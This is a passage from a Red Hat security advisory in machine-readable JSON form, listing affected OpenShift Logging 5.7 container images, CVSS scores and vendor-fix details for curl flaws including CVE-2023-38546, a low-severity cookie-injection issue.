"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2024:2093"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 3.7,
"baseSeverity": "LOW",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"products": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
}
],
"threats": [
{
"category": "impact",
"details": "Low"
}
],
"title": "curl: more POST-after-PUT confusion"
},
{
"acknowledgments": [
{
"names": [
"Reported-by: w0x42 on hackerone",
"Patched-by: Daniel Stenberg"
]
}
],
"cve": "CVE-2023-38546",
"cwe": {
"id": "CWE-73",
"name": "External Control of File Name or Path"
},
"discovery_date": "2023-10-03T00:00:00+00:00",
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2241938"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in the Curl package. This flaw allows an attacker to insert cookies into a running program using libcurl if the specific series of conditions are met.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "curl: cookie injection with none file",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "The flaw requires a series of conditions to be met and the likeliness that they shall allow an attacker to take advantage of it is low. Even if the bug could be made to trigger, the risk that a cookie injection can be done to cause harm is additionally also low.\n\nThe updated puppet-client has been released and consumed in downstream packages. This includes RH Satellite.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:25a5133ec301b3334446ccd2205d20209aaf246544b5c11d01f6b1b8885da046_amd64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:2a441a5b9d9ca81a769af0bf89245f437f3156b654ed25afa885960567166b9d_s390x",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:451c1497aa3e26d72a165923d36bbbec4a1ba6536f6ca1fab227467aae21bab6_arm64",
"8Base-RHOL-5.7:openshift-logging/fluentd-rhel8@sha256:f1b69daf30586538e51e61165ddb5c91d51524d6a020a6392955b726bfc9b1e4_ppc64le",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:3cfae28317e8fa0d73f66626827aa16e8b98b9e8961007b3aa1d4fa30ab663e6_s390x",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:80fc28564f2bb7d5324997722497a5a64db13b9a92c93e632323168b9ef12afc_arm64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:bb7addc37488f89ac93564dea9d76e3778eaa421206db72236d8aeb56195878a_amd64",
"8Base-RHOL-5.7:openshift-logging/kibana6-rhel8@sha256:c32a3c2d6c7246e73ebd17e4536b35dea61e4f2c91fda9d2ff704db83144233e_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:2800d2b1420d2db70ebcad5f9877d4269091a5a1aee6f411533ff21a6dc91877_amd64",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:6eabb34530d3fd81622fb63ff7787d014305690988c050993668206503b67344_ppc64le",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:b5f183b0c351d7f237a94773541fe9243a0dc7437d819620daadee68df08a540_s390x",
"8Base-RHOL-5.7:openshift-logging/log-file-metric-exporter-rhel8@sha256:c1f893de26335c435974ce6dc08cffd3d2dd4a4160aa9c6bc3e8885a2057b201_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:028325b6fe574bcf8af1366540e4da60b2ebca734caa3bf20de75e48b06abbfc_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:065a934e612868128f21b676e653e697b62aa1f684feb8c91f42681c1dc69dd9_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:53a88958754109e0397a1c2a4314efcb8095aaf6ceed99e29b458f260c4641ae_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-curator5-rhel8@sha256:9122fc216d96cbe5600214280e04c0685ba7dcda94bfd0d352bcee3d0a3bc118_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:4410e01bf80e2edf9e4ea0506bd23a0de143941c8338565edb0ffa04367993ce_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:50dee54ca2abbe169cb212f5303fa32a0d3fde7f0710aa8442ad3b75732010fd_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:84c737b00a68b7edfd013267b281d17826124724c4a127f1134d54cdb467327d_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-loki-rhel8@sha256:ef567b608176f5c369d8fda4ef7dffbaac0b77a9d5137a5c11179ad68491605b_arm64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5b7f4594f0f3c99f727ba7fe4e5e2d448a793317ccdaa20b065d4338392f20e3_amd64",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:5eb879fd8d4389ec692f5c5ce8dc4d5d8f25502100fc65f8d32963d17075e751_ppc64le",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:df59db956eebd9660557dd84d7b1fd8798948f34f561acc4ba9f602d674a2f7c_s390x",
"8Base-RHOL-5.7:openshift-logging/logging-view-plugin-rhel8@sha256:fc235e811b0555705b202b14f1355f07855ded3a8655f20b586850bddec63d43_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-operator-bundle@sha256:19253d82c2b591ce0571cdb7af1f78ba4f0f26945a0f23cced740e7614041afa_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:3b767616c05a9d8ebb64339cae8264f1ecec06cd8a39a0be5d998356b73e8a0f_arm64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:ba650502eb74b344a1909e6e6157bd643743ce7ceef834f2f04bf5466f59b87b_amd64",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:de04bbd436d7cae593ba9c39b95373756eb7a2ef48cb1cc7f0a97d9c19cd71f7_ppc64le",
"8Base-RHOL-5.7:openshift-logging/loki-rhel8-operator@sha256:f19e2ef6f679011cb197bc5d19c920a02a7fc0823d96892dd1256c3ac7ef3f8f_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:3f19a9f36830bf9bfe6287a89f47109bc7c33bd9dd15544034a7ea42cd959c49_arm64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:4db6a4f74f97b0488c7c496b12ef6a8aa68e772e7f76b2445531b5b6184985f3_amd64",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:6e68c0305cdf5232f024267eacc06ccc9077ae07889fcc006bbe9dd4a4f1c150_s390x",
"8Base-RHOL-5.7:openshift-logging/lokistack-gateway-rhel8@sha256:9bd9179c7f607779b7a5430f9d3c6872bcf149879eae54ec12bb76389d30e06c_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:31040aab576e551099b6a5a3d8f05df20c9f242d539aaa393bfe131f2dd5ece8_amd64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:8c2367d4caee4c93f67831412ef1f3d087e89bb4ae95157029d2a7b1eeb5f2d5_arm64",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:c6691999a6ec0a3f63009fca5863109cf6205aa42ea4495a17a00db89766ddb5_ppc64le",
"8Base-RHOL-5.7:openshift-logging/opa-openshift-rhel8@sha256:d2afab4c0e9e0cb3d2132b08fcd656851b132e1ebe6fb15e860faba8bad4598a_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:45c6577bf54cff252ace26b759fdb6dac4000e0cd2a28dd2989e196bd88eb7e4_arm64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:6a482c2b1e950f36ae86a787ea357715211bb97ffa0ed21fd72854b0873b38e9_s390x",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:caa92026abefc9d8fdd0b922b615906556e1d40e94ed040d37ae37000227c372_amd64",
"8Base-RHOL-5.7:openshift-logging/vector-rhel8@sha256:fd613e05b052acd318d8ca445a634c2439afc7bf4bec1fa2ca5552569e1ee98d_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2023-38546"
},
{
"category": "external",
"summary": "RHBZ#2241938",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241938"
},
{
"category": "external",
"summary": "RHSB-RHSA-2024:2101",
"url": "https://access.redhat.com/errata/RHSA-2024:2101"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2023-38546",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-38546"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2023-38546",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-38546"
},
{
"category": "external",
"summary": "https://curl.se/docs/CVE-2023-38546.html",
"url": "https://curl.se/docs/CVE-2023-38546.html"
}
],
"release_date": "2023-10-11T00:00:00+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2024-05-01T07:47:45+00:00",
"details": "For OpenShift Container Platform 4.11 see the following documentation, which will be updated shortly for this release, for important instructions on how to upgrade your cluster and fully apply this errata update:\n\nhttps://docs.openshift.com/container-platform/4.12/release_notes/ocp-4-12-release-notes.html\n\nFor Red Hat OpenShift Logging 5.7, see the following instructions to apply this update:\n\nhttps://docs.openshift.com/container-platform/4.12/logging/cluster-logging-upgrading.html",
"product_ids": [
"8Base-RHOL-5.7:openshift-logging/cluster-logging-operator-bundle@sha256:5052bba9c7eba5ad23b72f73429ecdbc2de555d9138a2d77ec271297b5030ffd_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:2c8e5b01f778d0c79cd5dd94476fca3c67f540c234735c9511c5a84fc08aab99_ppc64le",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:47f59d32139e8d738e1916321c52842e62f79724334c6af50ce988e283aa0a99_s390x",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:61c2a4170defd4022aa103f89394cb759fa349e7c146506f4c247e67b3b12c01_amd64",
"8Base-RHOL-5.7:openshift-logging/cluster-logging-rhel8-operator@sha256:e3da1a9825779d34882915353603bca4fb66accdd45aa9acc92ed2fe694071cd_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-operator-bundle@sha256:e7473220ed7c90e9828fa9f20ca7b5365abcceec9e0deb23ccd7fb1d59557457_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:16774c5a92ee7c8a5c841badba97b346cc1bdfb34b776331177ccea7d1967b5e_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:25f30f718ad1ff34d4658aa14c86eaac26f973d42d736f65fa68ab23d2256439_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:cfbaf603982debbd682ef4a5d5e2b8309c43e6db519699e793f55f4433d13327_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-proxy-rhel8@sha256:ec87f5708c1726a86cd075f1eb0c7c8f272e18311e898481282f29bb63189d26_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:2ec1ae08dd2f29a777d71003ae0d2a69eb56ad6e10742706ac35784faf45c08d_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:9c4d1c2beb0248c2f518e1e936298bfb9c9a22f87e2cbacd501cdaef675850e2_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:b884874a18a66126d49de1d0c253247b87371dc027f1d96b5615fbeb0adaa7b5_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch-rhel8-operator@sha256:c3f5921db6798608847173f2c6049f7a6bec470ead8aea936c13fb5348e6192a_s390x",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:0c04dbc3a45a08de0f6e53605c8e9db1fae051053dc524a70bf6d99746667a60_amd64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:44989bd7b7fe369ff2f3ba62b5db4d264b0a86d8cfccd96b720d74d50e9a4910_arm64",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:68453af0ac957b708b8972162a4e5382f2ec30fa6de79caf013ee876c2008654_ppc64le",
"8Base-RHOL-5.7:openshift-logging/elasticsearch6-rhel8@sha256:add0ccfb34e3f0798db0f544bdbc080706611b506eaa24fe8b39a369fba1af7c_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:33b90ea96d93fcc73e740227aa755d85e18566654668f89928572126d80535fe_ppc64le",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:7668e3265f4372a0d45342948ce1630e73cd88318e7fce7d720a685a3b240ece_s390x",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9ce55848e6d84082724ef735fd373726fdecf0935fc42061358a2704c405a3d5_amd64",
"8Base-RHOL-5.7:openshift-logging/eventrouter-rhel8@sha256:9f4432fa50935c4d18ae0b9a4da00bf82336347700d1a09643d6597247e1f2f9_arm64",
